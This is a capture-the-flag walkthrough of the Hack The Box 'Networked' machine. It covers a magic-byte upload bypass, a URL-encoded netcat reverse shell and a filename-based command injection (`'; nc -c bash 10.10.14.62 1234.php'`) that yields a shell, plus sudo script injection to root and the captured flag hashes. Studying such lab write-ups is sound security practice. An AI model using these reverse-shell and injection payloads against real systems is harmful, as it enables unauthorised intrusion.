Linux Boxes

networked

  1. nmapAutomator.sh
    1. nmap
      1. nmap vulns
    2. recon
      1. gobuster
        1. index.php
        2. /photos.php
        3. lib.php
        4. /upload.php
        5. /uploads
        6. /backup
          1. extract backup.tar
      2. nikto
  2. initial foothold
    1. upload.php backup
    2. magic bytes for png
    3. upload cmd.php
    4. cmd.php RCE
    5. reverse shell
  3. privesc to guly
    1. check_attack.php
      1. exfiltrate file with base64 encode
      2. lib.php changes?
      3. scandir
      4. touch -- '; nc -c bash 10.10.14.62 1234.php'
      5. reverse shell
  4. priv esc to root
    1. changename.sh
      1. vuln
      2. POC
  5. user/root
  6. lessons learned

networked

images/1229-1.png
images/1229-2.png

nmapAutomator.sh

nmap

recon

nmap

images/1231-1.png

images/1231-2.png
ssh running on port 22
http running on port 80


images/1231-3.png

nmap vulns

images/1233-1.png


images/1233-2.png


images/1233-3.png

images/1233-4.png

images/1233-5.png




recon

gobuster
nikto

images/1232-1.png

images/1232-2.png

gobuster

images/1234-1.png
status 200
/photos.php
/index.php
/lib.php
/uploads.php

status 301
/uploads
/backup

index.php

images/1237-1.png

/photos.php

images/1236-1.png

lib.php

blank
images/1238-1.pngs

/upload.php

very interesting find, we may be able to upload a reverse shell here

images/1239-1.png

/uploads

blank

images/1240-1.png

/backup

compressed backup file
lets download it

images/1243-1.png

extract backup.tar

Quick tar extraction tool usage for those unfamiliar:
images/518-1.png

images/518-2.png

nikto

images/1235-1.png
images/1235-2.png

initial foothold

first lets move our php reverse shell into our pwd

we can either upload a malicious php file to give us RCE or upload a php script that will call a shell back to us, either will work

images/1242-1.png
images/1242-2.png


images/1242-3.png
images/1242-4.png

upload.php backup

sifting through the 4 files extracted from the compressed backup file, upload.php is worth checking for potential vulnerabilities:
images/517-1.png

images/517-2.png
images/517-3.png

breaking this code down, upload.php is vulnerable to a magic byte spoof
this is because upload.php checks the validity of its uploads based off 2 parameters
1. Whether the file ends in a proper picture file suffiximages/517-4.pngimages/517-5.png
2. and whether or not a simple file command on the upload deems its a pictureimages/517-6.png

If the upload passes both these checks, it is given execute permissions images/517-7.png

magic bytes for png

since we know png's are an accepted filetype to upload, lets upload a png file and upload it to the server and intercept the packet with burp suite

images/1245-1.png
images/1245-2.png

upload to /upload.php
images/1245-3.png


now lets upload our php script, intercept the packet with burp suite, and paste a line or two of those png magic bytes
images/1245-4.png

upload cmd.php

first choose the file
images/1246-1.png

second intercept it
images/1246-2.png

send to repeater and rename cmd.php to cmd.php.png and add the png magic bytes “GIF8” above our php script
images/1246-3.png

and we see it's uploaded
images/1246-4.png

cmd.php RCE

lets navigate to the URL we just uploaded

if we visit /photos we can see the files we've uploaded
images/1247-1.png

right clicking our php.gif will allow us to implement RCE

http://10.10.10.146/uploads/10_10_14_62.php.jpeg?miao=whoami
images/1247-2.png

reverse shell

here Ill grab the netcatt OpenBSD reverse shell from payloadallthethings
images/1248-1.png

and url encode it with Burp
images/1248-2.png
set this value =miao and set up a listener on port 4242


http://10.10.10.146/uploads/10_10_14_62.php.jpeg?miao=%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%31%30%2e%31%34%2e%36%32%20%34%32%34%32%20%3e%2f%74%6d%70%2f%66
images/1248-3.png
and we have our foothold!


privesc to guly

with user apache's privileges we can get into guly's directory but we cannot get the user.txt flag yet, but we see some interesting files

images/1249-1.png

images/1249-2.png

check_attack.php

images/1250-1.png
images/1250-2.png

exfiltrate file with base64 encode

encode the file with base64 <filename>

images/1251-1.png

copy the string with echo -n “<string>”
| pipe it to base64 -d to decode it
and output it to file > check_attack.php
images/1251-2.png

now we get a prettier program to work with
images/1251-3.png
images/1251-4.png

lib.php changes?

we see that the script requires images/1252-1.png so lets see if we can change that

images/1252-2.png
unfortunately we dont have write permissions

scandir

images/1254-1.png
lets see exactly what scandir does using our own environment

images/1254-2.png

we see it scans the directory its in!
images/1254-3.png

now looking at check_attack.php
images/1254-4.png

we see we have control of the $value parameter since we can upload files to our victim, we just need to name the file something malicious and it will get executed by php exec without any sanitation!

exec can run multiple commands on one line if separated by a semi-colon so lets use that to our advantage here and get a little creative

images/1254-5.png
if we separate $path and $value with a semicolon ‘;’ we can write malicious code after it



touch -- '; nc -c bash 10.10.14.62 1234.php'

lets add a file into the directory that begins with a semicolon to kill the check_attack script and run a reverse shell

touch -- '; nc -c bash 10.10.14.62 1234.php'
where --' escapes the initial exec call
and nc -c bash 10.10.14.62 1234.php is our reverse shell call

(we want to label the file .php so check_attack will think we're attacking it and run the exec function
images/1253-1.png

this is what the directory should look like
images/1253-2.png

reverse shell

check_attack runs every 3 minutes since its a scheduled task
images/1255-1.png

so its only a matter of time
images/1255-2.png

priv esc to root

running sudo -l

images/1257-1.png
images/1257-2.png

changename.sh

images/1258-1.png

images/1258-2.png

vuln

first we must note our regular expressions allowed in this program
images/1260-1.png
we see \ / allows us to use a space

images/1260-2.png

this code reads in our input and reads it back out as x

now if we declare a variable in bash and run a command right after it we see:
images/1260-3.png

our command will run after our variable declaration


POC

if we enter a space and run bash in any of the changename.sh inputs it will exectute as root

images/1259-1.png

and we see we are root!

user/root

images/1256-1.png
526cfc2305f17faaacecf212c57d71c5

images/1256-2.png
0a8ecda83f1d81251099e8ac3d0dcb82

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/

images/1980-1.png